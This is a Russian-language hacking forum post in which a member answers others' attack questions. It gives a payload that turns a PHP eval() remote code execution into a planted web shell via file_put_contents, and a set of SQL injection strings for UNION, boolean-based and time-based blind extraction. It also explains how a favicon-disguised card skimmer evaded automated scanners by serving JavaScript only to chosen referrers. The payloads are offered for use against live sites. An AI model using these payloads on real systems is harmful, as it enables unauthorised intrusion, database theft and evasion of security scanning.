Показать сообщение отдельно

  #2813  
Старый 18.05.2020, 05:13
crlf
Постоянный
Регистрация: 18.03.2016
Сообщений: 663
Провел на форуме:
169212

Репутация: 441


По умолчанию

Цитата:
Сообщение от holdik  

Имеется RCE eval($e), скачивание извне запрещены, system passthru и тд запрещено. Какие варианты залить Шелл? Отблагодарю
Код:
rce=@file_put_contents($_POST[f],$_POST[c]);&f=./filename.php&c=
Цитата:
Сообщение от FireRidlle  

Код:
") or id=2 union select 1 -- -
ошибка
Код:
")*-1 UNION SELECT 1 -- если вывода нет, чекаем дальше
")*-1 UNION SELECT "'\"\\" -- // если ошибка, значит результат уходит в другой запрос, крутим по обстоятельствам
") OR SUBSTRING((SELECT VERSION()),1,1)=5 LIMIT 1 -- // boolean based true, есть вывод чего либо
") OR SUBSTRING((SELECT VERSION()),1,1)=1 LIMIT 1 -- // boolean based false, вывода нет
") AND IF(SUBSTRING((SELECT VERSION()),1,1)=5,SLEEP(100),SLEEP(0)); -- // крутим time based
Цитата:
Сообщение от Octavian  

Есть новость что воровали банковские данные через иконку сайта, мол иконка выдавалась на всех страницах но на сранице оплаты выдавался js файл keylogger. Это как что за тэг там был что работал и favicon и js?
https://www.bleepingcomputer.com/ne...te-favicon-to-camouflage-credit-card-skimmer/
Оригинал: https://blog.malwarebytes.com/threat...es-as-favicon/

Cервер отдавал JS только при "правильных" реферах, иначе выплёвывалась картинка. Браузер не подгружает левые майм типы для скриптов (script src) и ошибок никаких не возникает. А сделан сей трик, по всей видимости, для затруднения детекта автоматическими сканерами и анализаторами безопасности.

Статья немного вводит в заблуждение
 
Ответить с цитированием